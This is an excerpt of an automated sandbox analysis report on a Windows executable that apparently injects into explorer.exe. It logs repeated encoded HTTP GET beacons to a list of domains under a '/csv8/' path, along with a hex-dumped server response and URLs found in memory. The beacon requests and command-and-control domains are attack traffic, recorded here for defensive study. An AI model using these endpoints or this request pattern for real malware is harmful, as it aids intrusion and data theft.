            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=JcDbJrKBTdSh2qrV/QHXhZH9/vCGpAjnUxGYv0DqxJ8xNpceyS+NtrlgJ2Ns4M+VWFGw&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.starrockindia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=qn4X4+yxbbSsDYaEiiQ2PWd8LlsUN5GHqTXva27qpzu+WFndrUbREk96g9Cvik6UddJD&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.studentdividers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=iJ9LMG7MliwQjz4N9h8Hq4mQMyMQ8EbCXmiUEypb7zSuax6avA4zdFyQt2cMJ86uh/oE&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.epicmassiveconcepts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=Z54U04wqGI300YwketVjcixyHBr4HpwtQE6vF0nldb1Lz0z4UH78CnHRphUFHPRBURpw&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.colliapse.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=Vx5DYRfwQ2epFb7A1EFDXiUpfmaHAUA5hBGztbTHqIjku20m3oo4TlvQkKcY2MtY2Zvt&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.masterzushop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=9kzRsbxjodB183f+254XmaaPYHqImudbPq/bqqkJnFvk55YE4DuWwUiPiLBFKkj0LF/s&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.aldanasanchezmx.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=wz9bsKZezgylXE2xySv04yz/UXtzAnP44BanueQcObrBh8vQr+0W6/ezJrtA4EzaB/eD&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.bhoomimart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=XH4K2dDF2Z84HBPAGb7BC8YK+Vs0QVFZSQgY+MY/R5kdga2e+ACccNk2g5CQED5lfKqn&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.yyyut6.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=qrM/jq4OcB9vG2RwEV9Oj1wgtu+jolIiSW/njvsFRiZ9j79vyWJq+CFtdr2TsRW1k8yh&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.alparmuhendislik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=QLtdsMlXP7ZQlvjWT7fAeOzLoSV1+fXm7wWs73uECgmLouwXj2mCPN/rnODxivVfv92N&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.globepublishers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=SPYfUtJhDLYzT/ro+iJTgsw3x4bzIhIKNu8aW1ARl1xXF5uYI7qDVxucqZEX6pWizqEA&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.thedigitalsatyam.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=0hV2NfdVjmx+yfQvTLszaaA4nyOLrpeuP9TqtJZz9egJMD1sBqTfWGO8dwDzLIh3ahLd&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.scheherazadelegault.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=JcDbJrKBTdSh2qrV/QHXhZH9/vCGpAjnUxGYv0DqxJ8xNpceyS+NtrlgJ2Ns4M+VWFGw&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.starrockindia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 198.185.159.144 198.185.159.144
            Source: Joe Sandbox ViewIP Address: 198.185.159.144 198.185.159.144
            Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
            Source: Joe Sandbox ViewASN Name: EGIHOSTINGUS EGIHOSTINGUS
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=Z54U04wqGI300YwketVjcixyHBr4HpwtQE6vF0nldb1Lz0z4UH78CnHRphUFHPRBURpw&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.colliapse.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=Vx5DYRfwQ2epFb7A1EFDXiUpfmaHAUA5hBGztbTHqIjku20m3oo4TlvQkKcY2MtY2Zvt&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.masterzushop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=9kzRsbxjodB183f+254XmaaPYHqImudbPq/bqqkJnFvk55YE4DuWwUiPiLBFKkj0LF/s&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.aldanasanchezmx.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=wz9bsKZezgylXE2xySv04yz/UXtzAnP44BanueQcObrBh8vQr+0W6/ezJrtA4EzaB/eD&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.bhoomimart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=XH4K2dDF2Z84HBPAGb7BC8YK+Vs0QVFZSQgY+MY/R5kdga2e+ACccNk2g5CQED5lfKqn&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.yyyut6.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=qrM/jq4OcB9vG2RwEV9Oj1wgtu+jolIiSW/njvsFRiZ9j79vyWJq+CFtdr2TsRW1k8yh&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.alparmuhendislik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=QLtdsMlXP7ZQlvjWT7fAeOzLoSV1+fXm7wWs73uECgmLouwXj2mCPN/rnODxivVfv92N&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.globepublishers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=SPYfUtJhDLYzT/ro+iJTgsw3x4bzIhIKNu8aW1ARl1xXF5uYI7qDVxucqZEX6pWizqEA&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.thedigitalsatyam.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=0hV2NfdVjmx+yfQvTLszaaA4nyOLrpeuP9TqtJZz9egJMD1sBqTfWGO8dwDzLIh3ahLd&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.scheherazadelegault.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=JcDbJrKBTdSh2qrV/QHXhZH9/vCGpAjnUxGYv0DqxJ8xNpceyS+NtrlgJ2Ns4M+VWFGw&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.starrockindia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=qn4X4+yxbbSsDYaEiiQ2PWd8LlsUN5GHqTXva27qpzu+WFndrUbREk96g9Cvik6UddJD&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.studentdividers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=iJ9LMG7MliwQjz4N9h8Hq4mQMyMQ8EbCXmiUEypb7zSuax6avA4zdFyQt2cMJ86uh/oE&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.epicmassiveconcepts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=Z54U04wqGI300YwketVjcixyHBr4HpwtQE6vF0nldb1Lz0z4UH78CnHRphUFHPRBURpw&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.colliapse.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=Vx5DYRfwQ2epFb7A1EFDXiUpfmaHAUA5hBGztbTHqIjku20m3oo4TlvQkKcY2MtY2Zvt&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.masterzushop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=9kzRsbxjodB183f+254XmaaPYHqImudbPq/bqqkJnFvk55YE4DuWwUiPiLBFKkj0LF/s&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.aldanasanchezmx.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=wz9bsKZezgylXE2xySv04yz/UXtzAnP44BanueQcObrBh8vQr+0W6/ezJrtA4EzaB/eD&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.bhoomimart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=XH4K2dDF2Z84HBPAGb7BC8YK+Vs0QVFZSQgY+MY/R5kdga2e+ACccNk2g5CQED5lfKqn&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.yyyut6.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=qrM/jq4OcB9vG2RwEV9Oj1wgtu+jolIiSW/njvsFRiZ9j79vyWJq+CFtdr2TsRW1k8yh&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.alparmuhendislik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=QLtdsMlXP7ZQlvjWT7fAeOzLoSV1+fXm7wWs73uECgmLouwXj2mCPN/rnODxivVfv92N&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.globepublishers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=SPYfUtJhDLYzT/ro+iJTgsw3x4bzIhIKNu8aW1ARl1xXF5uYI7qDVxucqZEX6pWizqEA&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.thedigitalsatyam.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=0hV2NfdVjmx+yfQvTLszaaA4nyOLrpeuP9TqtJZz9egJMD1sBqTfWGO8dwDzLIh3ahLd&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.scheherazadelegault.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=JcDbJrKBTdSh2qrV/QHXhZH9/vCGpAjnUxGYv0DqxJ8xNpceyS+NtrlgJ2Ns4M+VWFGw&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.starrockindia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: unknownDNS traffic detected: queries for: www.colliapse.com
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginxDate: Wed, 13 Jan 2021 19:53:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINContent-Language: es-mxVary: Accept-Language, CookieData Raw: 64 37 61 0d 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 20 20 3c 68 65 61 64 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 0a 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 41 6c 64 61 6e 61 20 53 c3 a1 6e 63 68 65 7a 20 2d 20 49 6e 67 65 6e 69 65 72 6f 73 20 41 72 71 75 69 74 65 63 74 6f 73 20 7c 20 41 72 71 75 69 74 65 63 74 6f 73 20 65 6e 20 43 65 6e 74 72 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 64 61 6e 61 20 53 c3 a1 6e 63 68 65 7a 20 2d 20 49 6e 67 65 6e 69 65 72 6f 73 20 41 72 71 75 69 74 65 63 74 6f 73 20 7c 20 41 72 71 75 69 74 65 63 74 6f 73 20 65 6e 20 43 65 6e 74 72 6f 22 3e 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 64 61 6e 61 20 53 c3 a1 6e 63 68 65 7a 20 2d 20 49 6e 67 65 6e 69 65 72 6f 73 20 41 72 71 75 69 74 65 63 74 6f 73 22 3e 0a 20 20 20 20 20 20 0a 20 20 20 20 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 62 6f 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 73 74 61 74 69 63 2f 6e 65 77 5f 74 65 6d 70 6c 61 74 65 73 2f 69 6d 67 2f 79 65 6c 6c 6f 77 2f 77 65 62 70 72 6f 2e 69 63 6f 22 3e 0a 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 61 6c 65 77 61 79 3a 33 30 30 2c 34 30 30 2c 35 30 30 2c 36 30 30 2c 37 30 30 2c 38 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63
            Source: explorer.exe, 00000005.00000000.257657621.000000000F640000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: JAAkR51fQY.exe, 00000000.00000002.228844270.0000000002BF2000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.aldanasanchezmx.com
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.aldanasanchezmx.com/csv8/
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.aldanasanchezmx.com/csv8/www.bhoomimart.com
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.aldanasanchezmx.comReferer:
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.alparmuhendislik.com
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.alparmuhendislik.com/csv8/
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.alparmuhendislik.com/csv8/www.latin-hotspot.com
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.alparmuhendislik.comReferer:
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.ankitparivar.com
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.ankitparivar.com/csv8/
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.ankitparivar.comReferer:
            Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.bhoomimart.com
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.bhoomimart.com/csv8/
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.bhoomimart.com/csv8/www.yyyut6.com
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.bhoomimart.comReferer:
            Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.colliapse.com
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.colliapse.com/csv8/
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.colliapse.com/csv8/www.masterzushop.com
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.colliapse.comReferer:
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.epicmassiveconcepts.com
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.epicmassiveconcepts.com/csv8/
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.epicmassiveconcepts.com/csv8/www.magenx2.info
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.epicmassiveconcepts.comReferer:
            Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: JAAkR51fQY.exe, 00000000.00000003.227413251.0000000007E45000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comK
            Source: JAAkR51fQY.exe, 00000000.00000003.227413251.0000000007E45000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comasva
            Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: JAAkR51fQY.exe, 00000000.00000003.205857658.0000000007E52000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: JAAkR51fQY.exe, 00000000.00000003.205857658.0000000007E52000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnh
            Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.globepublishers.com
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.globepublishers.com/csv8/
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.globepublishers.com/csv8/www.thedigitalsatyam.com
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.globepublishers.comReferer:
            Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.herbmedia.net
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.herbmedia.net/csv8/
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.herbmedia.net/csv8/www.scheherazadelegault.com
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.herbmedia.netReferer:
            Source: JAAkR51fQY.exe, 00000000.00000003.207420358.0000000007E4B000.00000004.00000001.sdmp, JAAkR51fQY.exe, 00000000.00000003.206667781.0000000007E43000.00000004.00000001.sdmp, JAAkR51fQY.exe, 00000000.00000003.207211285.0000000007E49000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: JAAkR51fQY.exe, 00000000.00000003.207420358.0000000007E4B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/-cz
            Source: JAAkR51fQY.exe, 00000000.00000003.207420358.0000000007E4B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/.
            Source: JAAkR51fQY.exe, 00000000.00000003.206667781.0000000007E43000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp//e
            Source: JAAkR51fQY.exe, 00000000.00000003.207211285.0000000007E49000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y
            Source: JAAkR51fQY.exe, 00000000.00000003.207211285.0000000007E49000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0e
            Source: JAAkR51fQY.exe, 00000000.00000003.207061983.0000000007E47000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0onY
            Source: JAAkR51fQY.exe, 00000000.00000003.207420358.0000000007E4B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/f
            Source: JAAkR51fQY.exe, 00000000.00000003.207420358.0000000007E4B000.00000004.00000001.sdmp, JAAkR51fQY.exe, 00000000.00000003.207211285.0000000007E49000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
            Source: JAAkR51fQY.exe, 00000000.00000003.207420358.0000000007E4B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/K
            Source: JAAkR51fQY.exe, 00000000.00000003.207420358.0000000007E4B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s
            Source: JAAkR51fQY.exe, 00000000.00000003.207420358.0000000007E4B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/sDX
            Source: JAAkR51fQY.exe, 00000000.00000003.207420358.0000000007E4B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/t
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.latin-hotspot.com
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.latin-hotspot.com/csv8/
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.latin-hotspot.com/csv8/www.globepublishers.com
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.latin-hotspot.comReferer:
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.magenx2.info
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.magenx2.info/csv8/
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.magenx2.info/csv8/www.ankitparivar.com
